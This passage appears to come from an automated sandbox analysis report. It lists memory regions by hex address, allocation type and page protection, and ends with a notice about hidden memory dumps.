heap
page read and write
27B2000
trusted library allocation
page read and write
1EF3000
direct allocation
page read and write
1A749000
heap
page read and write
2E9000
heap
page read and write
309000
heap
page read and write
3B0000
heap
page read and write
3A2F000
trusted library allocation
page read and write
3839000
heap
page read and write
63B4000
heap
page read and write
7FE898A2000
trusted library allocation
page read and write
3801000
heap
page read and write
230000
heap
page read and write
4D62000
heap
page read and write
1E1000
heap
page read and write
27F0000
trusted library allocation
page execute read
1D34000
heap
page read and write
7FE89AA0000
trusted library allocation
page read and write
4DA6000
heap
page read and write
48B1000
heap
page read and write
1EF000
trusted library allocation
page read and write
46DE000
heap
page read and write
2190000
heap
page read and write
1A54A000
heap
page read and write
390000
heap
page read and write
430000
heap
page read and write
370000
heap
page read and write
3DA9000
heap
page read and write
170000
trusted library allocation
page read and write
4D6B000
heap
page read and write
3BB000
heap
page read and write
246B000
trusted library allocation
page read and write
3A2F000
trusted library allocation
page read and write
169000
heap
page read and write
377A000
trusted library allocation
page read and write
634A000
heap
page read and write
1B2D4000
heap
page read and write
4FD9000
heap
page read and write
2290000
heap
page execute and read and write
3A2F000
trusted library allocation
page read and write
51A6000
heap
page read and write
1FB0000
heap
page read and write
480000
heap
page read and write
1AF4F000
stack
page read and write
1B488000
heap
page read and write
618000
heap
page read and write
7FE899C0000
trusted library allocation
page execute and read and write
46DA000
heap
page read and write
2B2000
heap
page read and write
7FE89B60000
trusted library allocation
page read and write
3A2F000
trusted library allocation
page read and write
1A574000
heap
page execute and read and write
575000
heap
page read and write
367000
heap
page read and write
1A73F000
stack
page read and write
3F5000
heap
page read and write
25E000
heap
page read and write
1B5C4000
heap
page read and write
1C47D000
stack
page read and write
45E000
heap
page read and write
4FA0000
heap
page read and write
7FE89A4C000
trusted library allocation
page read and write
1D0000
trusted library allocation
page read and write
1C8000
heap
page read and write
4890000
heap
page read and write
620C000
heap
page read and write
4D62000
heap
page read and write
2E3000
heap
page read and write
3C70000
trusted library allocation
page read and write
377A000
trusted library allocation
page read and write
354D000
heap
page read and write
385000
heap
page read and write
1D3000
heap
page read and write
355D000
heap
page read and write
3A2F000
trusted library allocation
page read and write
2D7000
heap
page read and write
1A4000
heap
page read and write
3B5D000
trusted library allocation
page read and write
300000
heap
page read and write
24DF000
stack
page read and write
1CF8000
stack
page read and write
7FE89AF0000
trusted library allocation
page read and write
3EE000
heap
page read and write
7FE89C40000
trusted library allocation
page read and write
473D000
heap
page read and write
169000
heap
page read and write
48BF000
heap
page read and write
3273000
trusted library allocation
page read and write
AF0000
heap
page read and write
10000
heap
page read and write
1AE3F000
heap
page read and write
3AA0000
trusted library allocation
page read and write
40F000
heap
page read and write
6465000
heap
page read and write
7FE89B90000
trusted library allocation
page read and write
308F000
trusted library allocation
page read and write
1AFAF000
stack
page read and write
33C0000
trusted library allocation
page read and write
2E3000
heap
page read and write
4C39000
heap
page read and write
7FE89B40000
trusted library allocation
page read and write
B16000
heap
page read and write
4A31000
heap
page read and write
2CB000
heap
page read and write
7FE89B30000
trusted library allocation
page read and write
4C33000
heap
page read and write
1F20000
direct allocation
page read and write
1C62E000
stack
page read and write
3179000
trusted library allocation
page read and write
31F000
stack
page read and write
2220000
heap
page read and write
7FE898C0000
trusted library allocation
page read and write
4C29000
heap
page read and write
7FE89BD3000
trusted library allocation
page read and write
1C54C000
heap
page read and write
408F000
stack
page read and write
503000
heap
page read and write
4EF0000
heap
page read and write
7FE89AB0000
trusted library allocation
page read and write
20000
heap
page read and write
3DFA000
heap
page read and write
1B0000
heap
page read and write
40A000
heap
page read and write
7FE898B3000
trusted library allocation
page read and write
593000
heap
page read and write
3F2B000
stack
page read and write
2915000
trusted library allocation
page read and write
7FE89996000
trusted library allocation
page execute and read and write
3B3E000
stack
page read and write
4C22000
heap
page read and write
46E3000
heap
page read and write
7FE89AA4000
trusted library allocation
page read and write
7FE89B10000
trusted library allocation
page read and write
7FE89930000
trusted library allocation
page execute and read and write
7FE898BB000
trusted library allocation
page read and write
7FE89A52000
trusted library allocation
page read and write
51AA000
heap
page read and write
4EF5000
heap
page read and write
1B4AC000
stack
page read and write
4FD9000
heap
page read and write
377A000
trusted library allocation
page read and write
3AC0000
trusted library allocation
page read and write
1E7000
heap
page read and write
2463000
trusted library allocation
page read and write
23D0000
heap
page read and write
40C000
heap
page read and write
622F000
heap
page read and write
4C27000
heap
page read and write
63A9000
heap
page read and write
1A8A8000
stack
page read and write
641F000
heap
page read and write
481C000
heap
page read and write
3D32000
heap
page read and write
5E6000
heap
page read and write
4AA9000
heap
page read and write
1A848000
heap
page execute and read and write
234E000
stack
page read and write | page guard
400000
heap
page read and write
7FE89AC0000
trusted library allocation
page read and write
2731000
trusted library allocation
page read and write
1AFD5000
heap
page read and write
123E1000
trusted library allocation
page read and write
5A0000
heap
page read and write
12FFD000
trusted library allocation
page read and write
28E000
heap
page read and write
156000
stack
page read and write
1C80000
direct allocation
page read and write
361000
heap
page read and write
4CF1000
heap
page read and write
4A30000
heap
page read and write
1C60000
trusted library allocation
page read and write
340000
heap
page read and write
1E80000
direct allocation
page read and write
7FE89B00000
trusted library allocation
page read and write
4C32000
heap
page read and write
35BB000
heap
page read and write
4C35000
heap
page read and write
7FE89A88000
trusted library allocation
page read and write
1C140000
heap
page read and write
62D4000
heap
page read and write
1C1000
heap
page read and write
3DE6000
heap
page read and write
7FE89B50000
trusted library allocation
page read and write
385000
heap
page read and write
7FE89CB0000
trusted library allocation
page read and write
7FE89BE0000
trusted library allocation
page read and write
E0000
heap
page read and write
46DE000
heap
page read and write
1EA8000
stack
page read and write
21C0000
heap
page read and write
4FA0000
heap
page read and write
300D000
stack
page read and write
7FE89A90000
trusted library allocation
page execute and read and write
7FE89AF0000
trusted library allocation
page read and write
E4000
heap
page read and write
3DDE000
heap
page read and write
3DC0000
heap
page read and write
246D000
trusted library allocation
page read and write
477000
direct allocation
page read and write
355000
heap
page read and write
3B0000
heap
page read and write
1A594000
heap
page read and write
1A709000
stack
page read and write
1B0000
heap
page read and write
326E000
trusted library allocation
page read and write
4D67000
heap
page read and write
7FE89B50000
trusted library allocation
page read and write
20000
heap
page read and write
46DC000
heap
page read and write
628D000
heap
page read and write
4B5000
heap
page read and write
140000
trusted library allocation
page read and write
4DA1000
heap
page read and write
7FE89A10000
trusted library allocation
page read and write
1C94000
heap
page read and write
1AEBF000
stack
page read and write
4BD1000
heap
page read and write
4C37000
heap
page read and write
3DE0000
heap
page read and write
269A000
trusted library allocation
page read and write
48C000
heap
page read and write
48B7000
heap
page read and write
164000
heap
page read and write
7FE89960000
trusted library allocation
page read and write
305D000
trusted library allocation
page read and write
40A000
heap
page read and write
1B615000
heap
page read and write
1ADF0000
heap
page read and write
1A7BA000
stack
page read and write
1A69E000
heap
page read and write
1B3DE000
stack
page read and write
4C37000
heap
page read and write
4850000
heap
page read and write
4C32000
heap
page read and write
7FE89A43000
trusted library allocation
page read and write
4849000
heap
page read and write
106000
heap
page read and write
10FF000
stack
page read and write
5715000
heap
page read and write
1C3CD000
stack
page read and write
1BB0000
heap
page read and write
7FE89C20000
trusted library allocation
page read and write
17F000
trusted library allocation
page read and write
554000
heap
page read and write
1A798000
stack
page read and write
10000
heap
page read and write
1C490000
heap
page read and write
48BF000
heap
page read and write
2BDF000
stack
page read and write
2469000
trusted library allocation
page read and write
4490000
trusted library allocation
page read and write
474000
remote allocation
page execute and read and write
3051000
trusted library allocation
page read and write
430000
heap
page read and write
3DD8000
heap
page read and write
3A2F000
trusted library allocation
page read and write
317E000
trusted library allocation
page read and write
714000
heap
page read and write
4DCF000
heap
page read and write
3B10000
heap
page read and write
363A000
heap
page read and write
2AD000
heap
page read and write
12554000
trusted library allocation
page read and write
1C9DE000
stack
page read and write
35F9000
heap
page read and write
1C2AF000
heap
page read and write
4DA8000
heap
page read and write
4890000
heap
page read and write
1C5A5000
heap
page read and write
10000
heap
page read and write
48B000
direct allocation
page read and write
4C7E000
heap
page read and write
39D000
heap
page read and write
1A64D000
stack
page read and write
1AC98000
heap
page read and write
683000
heap
page read and write
3C6D000
stack
page read and write
1CDB000
direct allocation
page read and write
3B5D000
trusted library allocation
page read and write
3EE000
heap
page read and write
1C31E000
stack
page read and write
4480000
trusted library allocation
page read and write
36D000
heap
page read and write
30A000
heap
page read and write
384000
heap
page read and write
3E1000
heap
page read and write
7FE89A60000
trusted library allocation
page execute and read and write
534000
heap
page read and write
1B0000
trusted library allocation
page read and write
1C96C000
stack
page read and write
20000
heap
page read and write
327A000
trusted library allocation
page read and write
5172000
heap
page read and write
3F8F000
trusted library allocation
page read and write
5F0000
heap
page read and write
7FE89A40000
trusted library allocation
page execute and read and write
3B0000
heap
page read and write
1BA000
heap
page read and write
2461000
trusted library allocation
page read and write
3DDA000
heap
page read and write
304000
heap
page read and write
466000
heap
page read and write
25B000
heap
page read and write
1AA89000
stack
page read and write
7FE89B80000
trusted library allocation
page read and write
326E000
trusted library allocation
page read and write
4AA9000
heap
page read and write
372000
heap
page read and write
4490000
trusted library allocation
page read and write
373000
heap
page read and write
1C32C000
stack
page read and write
2B6000
heap
page read and write
1A765000
heap
page read and write
387C000
stack
page read and write
1C5AE000
stack
page read and write
3882000
heap
page read and write
535000
heap
page read and write
3DFA000
heap
page read and write
4879000
heap
page read and write
1B3F0000
heap
page read and write
7FE898C0000
trusted library allocation
page read and write
7FE89C10000
trusted library allocation
page read and write
35BB000
heap
page read and write
7FE898BD000
trusted library allocation
page execute and read and write
12481000
trusted library allocation
page read and write
1B5E8000
heap
page read and write
7FE89C0D000
trusted library allocation
page read and write
1B10F000
stack
page read and write
7FE89A52000
trusted library allocation
page read and write
1EF3000
direct allocation
page read and write
2150000
trusted library allocation
page read and write
2421000
trusted library allocation
page read and write
23E6000
heap
page read and write
1C8000
heap
page read and write
12550000
trusted library allocation
page read and write
555000
heap
page read and write
2A52000
trusted library allocation
page read and write
3F8000
heap
page read and write
35E000
heap
page read and write
7FE89AA0000
trusted library allocation
page read and write
48BF000
heap
page read and write
300000
heap
page read and write
3DFA000
heap
page read and write
7FE89A80000
trusted library allocation
page execute and read and write
124E1000
trusted library allocation
page read and write
3EF0000
trusted library allocation
page read and write
7FE89AE0000
trusted library allocation
page read and write
4890000
heap
page read and write
489000
heap
page read and write
4DCF000
heap
page read and write
45E000
heap
page read and write
2240000
heap
page read and write
7FE89A60000
trusted library allocation
page execute and read and write
57E000
heap
page read and write
7FE89A57000
trusted library allocation
page read and write
124EF000
trusted library allocation
page read and write
7FE89BD0000
trusted library allocation
page read and write
4879000
heap
page read and write
4F68000
heap
page read and write
70000
heap
page read and write
3062000
trusted library allocation
page read and write
1B3CC000
stack
page read and write
3DDC000
heap
page read and write
7FE89B30000
trusted library allocation
page read and write
7FE89A90000
trusted library allocation
page read and write
7FE89A78000
trusted library allocation
page read and write
424000
heap
page read and write
7FE898C3000
trusted library allocation
page read and write
7FE89BC0000
trusted library allocation
page read and write
44E000
heap
page read and write
7FFFFF80000
trusted library allocation
page readonly
20000
heap
page read and write
355D000
heap
page read and write
298000
stack
page read and write
1A699000
stack
page read and write
38A3000
heap
page read and write
2AD000
heap
page read and write
2350000
heap
page read and write
2997000
trusted library allocation
page read and write
7FE89BD0000
trusted library allocation
page read and write
7FFFFF87000
trusted library allocation
page execute read
1A4F0000
heap
page read and write
7FE89AA8000
trusted library allocation
page read and write
358000
heap
page read and write
5178000
heap
page read and write
2C40000
remote allocation
page read and write
7FE89A27000
trusted library allocation
page read and write
50C000
heap
page read and write
1B4C0000
heap
page read and write
250000
heap
page read and write
4DAA000
heap
page read and write
1B5C6000
heap
page read and write
7FE89BD0000
trusted library allocation
page read and write
74000
heap
page read and write
3DFA000
heap
page read and write
1CB0E000
stack
page read and write
7FE898B0000
trusted library allocation
page read and write
1E7000
heap
page read and write
1AC7F000
stack
page read and write
7FE89A23000
trusted library allocation
page read and write
1B2CE000
stack
page read and write
1C90000
heap
page read and write
12558000
trusted library allocation
page read and write
304000
heap
page read and write
3DBE000
heap
page read and write
3A2F000
trusted library allocation
page read and write
355E000
heap
page read and write
2785000
trusted library allocation
page read and write
5161000
heap
page read and write
4818000
heap
page read and write
3901000
heap
page read and write
4854000
heap
page read and write
3A2F000
trusted library allocation
page read and write
12411000
trusted library allocation
page read and write
488E000
heap
page read and write
1CC0000
heap
page read and write
4D63000
heap
page read and write
7FE898C3000
trusted library allocation
page read and write
15B000
heap
page read and write
486B000
heap
page read and write
7FE8995C000
trusted library allocation
page execute and read and write
4C39000
heap
page read and write
2180000
trusted library allocation
page read and write
7FE89AB0000
trusted library allocation
page read and write
3E01000
heap
page read and write
5B0000
heap
page read and write
2ED000
heap
page read and write
4A70000
heap
page read and write
3B5D000
trusted library allocation
page read and write
3F5000
heap
page read and write
531000
heap
page read and write
1A420000
heap
page execute and read and write
7FE89AF0000
trusted library allocation
page read and write
4D9000
heap
page read and write
3C6000
heap
page read and write
1AE56000
heap
page read and write
400000
trusted library allocation
page read and write
EB000
stack
page read and write
24CE000
trusted library allocation
page read and write
3A2F000
trusted library allocation
page read and write
481C000
heap
page read and write
1ACB2000
heap
page read and write
593000
heap
page read and write
4A9D000
heap
page read and write
1C3B3000
heap
page read and write
2D5000
heap
page read and write
B2000
stack
page read and write
3176000
trusted library allocation
page read and write
7FE89990000
trusted library allocation
page execute and read and write
4C7D000
heap
page read and write
7FE89966000
trusted library allocation
page execute and read and write
435000
heap
page read and write
3C90000
heap
page read and write
29CA000
trusted library allocation
page read and write
2473000
trusted library allocation
page read and write
165000
heap
page read and write
227000
heap
page read and write
481F000
heap
page read and write
535000
heap
page read and write
3DB3000
heap
page read and write
302000
heap
page read and write
412000
heap
page read and write
1B1000
heap
page read and write
7FE89A74000
trusted library allocation
page read and write
1B49C000
stack
page read and write
7FE89A40000
trusted library allocation
page execute and read and write
66C000
heap
page read and write
1C2B7000
heap
page read and write
3B5A000
trusted library allocation
page read and write
12451000
trusted library allocation
page read and write
6379000
heap
page read and write
54E000
heap
page read and write
475000
heap
page read and write
143000
stack
page read and write
42ED000
trusted library allocation
page read and write
1C225000
heap
page read and write
241F000
stack
page read and write
3561000
heap
page read and write
327A000
trusted library allocation
page read and write
2CA0000
heap
page read and write
317D000
trusted library allocation
page read and write
4321000
trusted library allocation
page read and write
428000
heap
page read and write
3566000
heap
page read and write
6D0000
direct allocation
page read and write
26C000
stack
page read and write
2507000
trusted library allocation
page read and write
1B00B000
heap
page read and write
3DDA000
heap
page read and write
42FF000
stack
page read and write
6200000
heap
page read and write
1AE6E000
stack
page read and write
4884000
heap
page read and write
7FE89BF4000
trusted library allocation
page read and write
4094000
trusted library allocation
page read and write
1EA0000
direct allocation
page read and write
535000
heap
page read and write
190000
heap
page read and write
4D67000
heap
page read and write
1C37C000
heap
page read and write
4A9A000
heap
page read and write
1D1E000
heap
page read and write
7FE89B40000
trusted library allocation
page read and write
7FE89940000
trusted library allocation
page read and write
4C23000
heap
page read and write
169000
heap
page read and write
3C9000
heap
page read and write
23BD000
trusted library allocation
page read and write
2C8000
heap
page read and write
150000
heap
page read and write
5160000
heap
page read and write
403E000
stack
page read and write
2882000
trusted library allocation
page read and write
263000
heap
page read and write
7FE89B60000
trusted library allocation
page read and write
363C000
heap
page read and write
1C760000
heap
page read and write
7FE89B20000
trusted library allocation
page read and write
7FE89B90000
trusted library allocation
page read and write
7FE89B50000
trusted library allocation
page read and write
7FE89950000
trusted library allocation
page execute and read and write
3A2F000
trusted library allocation
page read and write
7FE89AD0000
trusted library allocation
page read and write
2A63000
trusted library allocation
page read and write
3635000
heap
page read and write
4C2B000
heap
page read and write
4BD000
heap
page read and write
4818000
heap
page read and write
4AA7000
heap
page read and write
436000
heap
page read and write
27F9000
trusted library allocation
page read and write
3B5D000
trusted library allocation
page read and write
2E0000
trusted library allocation
page read and write
326A000
trusted library allocation
page read and write
4DCF000
heap
page read and write
4856000
heap
page read and write
10000
heap
page read and write
1AD32000
heap
page read and write
3C4000
heap
page read and write
1C0000
heap
page read and write
490000
heap
page read and write
1AE54000
heap
page read and write
2F7000
heap
page read and write
3D45000
heap
page read and write
12511000
trusted library allocation
page read and write
1BE000
heap
page read and write
1CC3000
direct allocation
page read and write
1B2D0000
heap
page read and write
3A2F000
trusted library allocation
page read and write
377A000
trusted library allocation
page read and write
4776000
heap
page read and write
7FE89BAD000
trusted library allocation
page read and write
459000
heap
page read and write
1B25E000
stack
page read and write
23D0000
heap
page execute and read and write
1B3F4000
heap
page read and write
3E01000
heap
page read and write
38C000
heap
page read and write
488E000
heap
page read and write
1ADDB000
heap
page read and write
4890000
heap
page read and write
34E000
heap
page read and write
3E01000
heap
page read and write
231E000
stack
page read and write | page guard
230000
heap
page read and write
41E000
heap
page read and write
D0000
heap
page read and write
1E7000
heap
page read and write
48C9000
heap
page read and write
47D0000
trusted library allocation
page read and write
4887000
heap
page read and write
4DA3000
heap
page read and write
4739000
heap
page read and write
1B35E000
direct allocation
page read and write
1A66F000
stack
page read and write
481000
heap
page read and write
3CBD000
stack
page read and write
4DAF000
heap
page read and write
1C5000
heap
page read and write
100000
heap
page read and write
7FE89970000
trusted library allocation
page execute and read and write
2467000
trusted library allocation
page read and write
1ACEE000
heap
page read and write
4B8000
heap
page read and write
1C520000
heap
page read and write
4C1E000
heap
page read and write
4730000
heap
page read and write
3182000
trusted library allocation
page read and write
4778000
heap
page read and write
1AAF9000
stack
page read and write
3882000
heap
page read and write
3A2F000
trusted library allocation
page read and write
1C5CF000
heap
page read and write
1A8FF000
stack
page read and write
5178000
heap
page read and write
425000
heap
page read and write
3DA000
heap
page read and write
4B5000
heap
page read and write
AF8000
heap
page read and write
4AA9000
heap
page read and write
24A000
heap
page read and write
3C0000
heap
page read and write
2D7B000
heap
page read and write
486000
heap
page read and write
449000
heap
page read and write
3179000
trusted library allocation
page read and write
1C260000
heap
page read and write
4AA9000
heap
page read and write
1B5A0000
heap
page read and write
7FE89A53000
trusted library allocation
page read and write
460000
heap
page read and write
1AF000
heap
page read and write
4D58000
heap
page read and write
123AD000
trusted library allocation
page read and write
1C3EB000
stack
page read and write
48B1000
heap
page read and write
1A676000
heap
page read and write
1B0000
heap
page read and write
1C31B000
heap
page read and write
7FE89A90000
trusted library allocation
page read and write
4190000
trusted library allocation
page read and write
320000
heap
page read and write
7FE89B70000
trusted library allocation
page read and write
1B64F000
heap
page read and write
10000
heap
page read and write
7FE89B50000
trusted library allocation
page read and write
7FE899B0000
trusted library allocation
page execute and read and write
326F000
trusted library allocation
page read and write
1AF2E000
stack
page read and write
3B5D000
trusted library allocation
page read and write
7FE898AD000
trusted library allocation
page execute and read and write
1B41E000
stack
page read and write
4480000
trusted library allocation
page read and write
395000
heap
page read and write
3DC5000
heap
page read and write
56C000
heap
page read and write
7FE89AF0000
trusted library allocation
page read and write
62A5000
heap
page read and write
4C7D000
heap
page read and write
2A0000
heap
page read and write
2870000
trusted library allocation
page read and write
1A5B7000
heap
page read and write
1AD21000
heap
page read and write
1B02E000
stack
page read and write
3CC000
heap
page read and write
1B106000
heap
page read and write
12439000
trusted library allocation
page read and write
377A000
trusted library allocation
page read and write
3DF0000
heap
page read and write
3B5A000
trusted library allocation
page read and write
1ACC8000
heap
page read and write
4C25000
heap
page read and write
258000
heap
page read and write
1C9B000
heap
page read and write
3270000
trusted library allocation
page read and write
3A2F000
trusted library allocation
page read and write
3A2F000
trusted library allocation
page read and write
338000
heap
page read and write
21C000
stack
page read and write
1B4D8000
heap
page read and write
38B5000
trusted library allocation
page read and write
3E01000
heap
page read and write
234F000
stack
page read and write
1AFD0000
heap
page read and write
4F87000
heap
page read and write
1A45E000
heap
page execute and read and write
1D56000
heap
page read and write
4DCC000
heap
page read and write
7FE8987D000
trusted library allocation
page execute and read and write
7FE8988D000
trusted library allocation
page execute and read and write
502F000
heap
page read and write
33A0000
trusted library allocation
page read and write
4D4000
heap
page read and write
7FE89B10000
trusted library allocation
page read and write
380000
heap
page read and write
3EE000
heap
page read and write
4C7D000
heap
page read and write
377A000
trusted library allocation
page read and write
1E0000
trusted library allocation
page read and write
379F000
stack
page read and write
3F6000
heap
page read and write
51C000
heap
page read and write
3A20000
trusted library allocation
page read and write
328000
heap
page read and write
3DB4000
heap
page read and write
3A2F000
trusted library allocation
page read and write
3B5D000
trusted library allocation
page read and write
4D6B000
heap
page read and write
7FE89883000
trusted library allocation
page execute and read and write
7FE89893000
trusted library allocation
page execute and read and write
1C2E8000
heap
page read and write
47D0000
trusted library allocation
page read and write
1A57E000
heap
page execute and read and write
1C9CF000
stack
page read and write
25E3000
trusted library allocation
page read and write
7FE89880000
trusted library allocation
page read and write
6442000
heap
page read and write
336000
heap
page read and write
3DE6000
heap
page read and write
1AF000
heap
page read and write
1AFA0000
heap
page read and write
1B60000
heap
page read and write
7FE899D0000
trusted library allocation
page execute and read and write
7FE89920000
trusted library allocation
page read and write
35EE000
stack
page read and write
459000
heap
page read and write
50A000
heap
page read and write
39E000
heap
page read and write
2E4000
heap
page read and write
3E20000
heap
page read and write
7FE89B70000
trusted library allocation
page read and write
1F6000
heap
page read and write
2709000
trusted library allocation
page read and write
22E0000
heap
page execute and read and write
25F000
trusted library allocation
page read and write
4D58000
heap
page read and write
7FE898A3000
trusted library allocation
page read and write
7FE8994C000
trusted library allocation
page execute and read and write
1B0A0000
heap
page read and write
4C34000
heap
page read and write
1B5A0000
heap
page read and write
2B0000
trusted library allocation
page read and write
3182000
trusted library allocation
page read and write
334000
heap
page read and write
1B0000
heap
page read and write
1B631000
heap
page read and write
7FE89A92000
trusted library allocation
page read and write
7FE89A84000
trusted library allocation
page read and write
484D000
heap
page read and write
2B24000
heap
page read and write
7FE89B80000
trusted library allocation
page read and write
2A85000
trusted library allocation
page read and write
There are 2271 hidden memdumps, click here to show them.